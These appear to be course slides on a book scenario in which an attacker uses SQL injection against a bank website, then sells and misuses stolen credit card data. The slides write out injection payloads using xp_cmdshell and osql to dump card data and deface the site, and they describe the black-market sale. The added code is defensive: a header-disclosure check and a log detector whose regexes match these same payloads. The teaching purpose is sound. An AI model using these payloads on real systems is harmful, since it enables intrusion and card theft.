TEL 283 Getting out of Credit Card Debt

Post on 19-Dec-2015

Page 1: Getting out of Credit Card Debt.  Chained Exploits ◦ Whitaker, Evans, Voth; Addison-Wesley, 2009

TEL 283: Getting out of Credit Card Debt

Page 2: Resources Utilized
- Chained Exploits ◦ Whitaker, Evans, Voth; Addison-Wesley, 2009

Page 3: Ethics
- The methods discussed in this course are considered illegal
  ◦ Under no circumstances should these tools or methods be used on any networked system without the explicit written permission of an authorized grantor within that organization
  ◦ The document should be witnessed and should delineate the boundaries of your actions
  ◦ A signed document for this course indicates that you understand and appreciate the nature of the concepts and methodologies

Page 4: Ethics
- What is the purpose of teaching these methods and tools?
  ◦ So that you, as a professional, will understand the methods and tools and be able to determine when and how they were leveraged against you
  ◦ Find traces of them during an investigation
  ◦ Proactively search for and deter an attack

Page 5: What is a "Chained Exploit"?
- An attack consisting of several exploits or attacks carried out in sequence in order to achieve a goal

Page 6: Credit Card Debt
- "Phoenix" (obviously not his real name) is in debt for thousands of dollars to a bank's credit card system, and his rate has just gone up to 29%
  ◦ Plans to pay off his debt by hitting the bank's system (PDXO Financial)
  ◦ If he uses another person's card to pay off his own, it will be noticed
  ◦ Plans to steal credit card information and sell it on the black market

Page 7: Steps
1. Enumerate the website
2. Enumerate the cc database
3. Get cc info from the website
4. Sell the cc info on the underground market
5. Trash the website (misdirection)

Page 8: Enumerate the Website
- Uncover as much information about the website as possible
  ◦ Operating system
  ◦ Web server version running
- RFC 2616 specifies the format of HTTP responses
- Some headers returned might contain valuable information regarding the server or site

Page 9: Enumerate the Website
- Telnet to the website on port 80 (or whatever port the site is on)
    telnet www.PDXOfinancial.com 80
- Once connected
  ◦ Issue the command to receive the site's HTTP header
    HEAD / HTTP/1.1[cr][cr]
- Server type might be revealed
  ◦ Example shows a "HEAD" request to www.marist.edu
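The HEAD request above is also how an administrator audits what their own server discloses. The following is an added example, not from the slides or the book: it parses a raw RFC 2616 response and lists the headers that reveal software or version information. The sample response is constructed, and the header list and function names are the example's own choices.

```python
import http.client
from email.parser import Parser

# Response headers that commonly disclose server software or versions
# (assumed list for this example; extend it for your own platform).
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")

def parse_head_response(raw: bytes) -> tuple[str, dict]:
    """Split a raw HTTP response (RFC 2616 format) into its status line and headers."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    status_line, _, header_block = head.decode("iso-8859-1").partition("\r\n")
    headers = Parser().parsestr(header_block, headersonly=True)
    return status_line, {k.lower(): v for k, v in headers.items()}

def disclosing_headers(headers: dict) -> dict:
    """Return only the headers that reveal software or version information."""
    return {k: v for k, v in headers.items() if k in DISCLOSING_HEADERS}

def head_request(host: str, port: int = 80, timeout: float = 5.0) -> dict:
    """Issue the same HEAD / request the slide types into telnet, via http.client,
    and return the lower-cased response headers."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("HEAD", "/", headers={"Host": host})
        resp = conn.getresponse()
        return {k.lower(): v for k, v in resp.getheaders()}
    finally:
        conn.close()

# Constructed sample response (not captured from any real host): a default
# IIS 5.0 install answering the HEAD request.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Date: Mon, 07 Dec 2009 18:02:11 GMT\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"Content-Length: 1433\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    status, hdrs = parse_head_response(SAMPLE_RESPONSE)
    print(status)
    for name, value in disclosing_headers(hdrs).items():
        print(f"disclosed: {name}: {value}")
```

After applying the countermeasure on the last slide (changing the default response header), the same check against your own host should return an empty result.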

Page 10: GoolagScan
- Tool developed by the Cult of the Dead Cow
  ◦ www.cultdeadcow.com
  ◦ Uses Google hacking techniques discovered by Johnny Long (johnny.ihackstuff.com)
- Checks strings against the website to find files containing passwords, vulnerable files, or directories of interest

Page 11: Background Information
- PDXO merged
  ◦ Might have development websites running due to the changes
    development.PDXOfinancial.com
    beta.PDXOfinancial.com
    test.PDXOfinancial.com
    dev.PDXOfinancial.com
- Checking possible sites might result in bringing up an unprotected web page
  ◦ In this case, the login form

Page 12: Enumerate the CC Database
- Is the DB server on the same host as the website?
- Is MS SQL Server used for the DB?
  ◦ Default username of "SA" w/o password?
- Is the website installed in the default IIS location?
  ◦ inetpub\wwwroot
  ◦ This directory allows for write access
- This presumes several weaknesses
  ◦ Possible because the page comes from a development site
  ◦ Moral: build security in, even during the development phase of the SDLC

Page 13: SQL Injection
- The ability of a user to craft an SQL or database command from the client side

Page 14: Uncover the Names of the Databases
- The default database is called "MASTER"
- Get the names of the databases in the MASTER file
    select * from master..sysdatabases
  ◦ The database expects a username prior to this command, so we need to fool the database into thinking we've already done this
- Supply a command terminator character ";" before the select command
    ; select * from master..sysdatabases
  ◦ Prevent another command from being entered after this by adding a "comment" indicator "--" after the command
    ; select * from master..sysdatabases --

Page 15: OSQL
- The difficulty with the SQL command is that the output would not be returned
  ◦ Use "osql", which is a command line utility
  ◦ Send the output to a text file
- Parameters for osql
  ◦ -U username
  ◦ -P password (blank if none supplied)
  ◦ -Q enter SQL command and exit
  ◦ -o output file specified
    osql -U sa -P "" -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\output.txt

Page 16: OSQL
- osql is a command line utility and needs to be entered at the command prompt
  ◦ The hacker is not at a command prompt
  ◦ Can use an SQL stored procedure which will execute a command
  ◦ exec xp_cmdshell '<command goes here>'
- So...
    exec xp_cmdshell 'osql -U sa -P "" -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\output.txt' --

Page 17: SQL Injection
- Phoenix uses the form to submit his SQL command to the webserver
  ◦ Webserver passes the command along to the database server for execution w/o verification
  ◦ Text file is written to the webserver's document directory
- Phoenix changes the URL to that of the output file on the server in order to browse the contents
- Examine the contents and see if there are any databases of interest
    creditcards    C:\Program Files\Microsoft SQL Server\MSSQL\data\creditcards.MDF

Page 18: SQL Injection
- Now that you have the name of the database
  ◦ Get the table names by changing the SQL command
    select * from creditcards..sysobjects
- One of the tables is called "cardnumbers"
    select * from creditcards..cardnumbers
- The dumped information will be in the output file on the IIS server
  ◦ Contains names, expiration dates, CVVs, CC numbers, and PINs

Page 19: Selling CC Information
- Phoenix uses an NNTP client (NewsRover) to check the alt.2600 newsgroup
  ◦ Posts a message regarding the sale of cc info
- Sets up a bogus email address
  ◦ [email protected]
- Uses "spammimic" to disguise the message as spam
  ◦ Looks like a spam message, but those in the know will recover the hidden message using spammimic
  ◦ Can be protected with a password, or encoded as a phony PGP message or as false Cyrillic text
- This message is posted to alt.2600 using the phony email address
- A respondent agrees to pay $12,000 into a Swiss account
  ◦ Phoenix's CC number is one of the many cards sold
- Phoenix cancels his card

Page 20: Defacing the Website
- IIS 5.0 Server
- MS SQL Server
  ◦ Default username of SA w/o password
  ◦ Hosted on the same host as the website
- The xp_cmdshell stored procedure will be used to overwrite the landing page on the website
    ;exec xp_cmdshell 'echo You've been hacked! > c:\inetpub\wwwroot\default.asp' --

Page 21: Countermeasures
- Change the default HTTP response header
- Do not allow public access to the development sites
- Do not keep the SQL server on the same host as the IIS server
- "Sanitize" / validate user form input
- Don't put IIS in the default location
- Make the site read-only
- Don't keep unnecessary stored procedures
- Don't use defaults (username / passwords) for the database
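Every step of this chain leaves traces in the IIS web logs: the injected form field arrives URL-encoded in the query string, and the dumped output is then fetched from the document root. The following added detection example (not from the slides or the book) parses a constructed W3C extended log excerpt and flags the indicators the slides describe; the log lines, indicator names and the list of unexpected files are the example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C extended log excerpt (not from any real server). The
# query-string field is URL-encoded, so indicators must be matched after decoding.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2009-12-07 18:02:11 10.0.0.5 GET /default.asp - 200
2009-12-07 18:03:40 10.0.0.5 POST /login.asp user=%3B+select+*+from+master..sysdatabases+-- 200
2009-12-07 18:05:02 10.0.0.5 POST /login.asp user=%3Bexec+xp_cmdshell+%27osql+-U+sa+-P+%22%22+-Q+%22select+*+from+creditcards..cardnumbers%22+-o+c%3A%5Cinetpub%5Cwwwroot%5Coutput.txt%27+-- 200
2009-12-07 18:05:30 10.0.0.5 GET /output.txt - 200
2009-12-07 18:06:00 10.0.0.9 GET /default.asp - 200
"""

# Indicators drawn from the attack chain on these slides.
INDICATORS = {
    "stacked_query_comment": re.compile(r";.*--"),
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
    "system_catalog": re.compile(r"\b(sysdatabases|sysobjects)\b", re.I),
    "osql_client": re.compile(r"\bosql\b", re.I),
}
# Files that should never be served from this site's document root (assumed list).
UNEXPECTED_STEMS = {"/output.txt"}

def parse_w3c(log_text: str) -> list[dict]:
    """Parse W3C extended format, taking column names from the #Fields directive."""
    fields, rows = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def detect(log_text: str) -> list[tuple[str, str, str]]:
    """Return (time, c-ip, reason) for each request matching an indicator."""
    hits = []
    for row in parse_w3c(log_text):
        query = unquote_plus(row["cs-uri-query"]) if row["cs-uri-query"] != "-" else ""
        for name, pattern in INDICATORS.items():
            if pattern.search(query):
                hits.append((row["time"], row["c-ip"], name))
        if row["cs-uri-stem"] in UNEXPECTED_STEMS:
            hits.append((row["time"], row["c-ip"], "unexpected_file_request"))
    return hits
```

Running detect(SAMPLE_LOG) attributes all hits to 10.0.0.5 and leaves the ordinary default.asp requests unflagged.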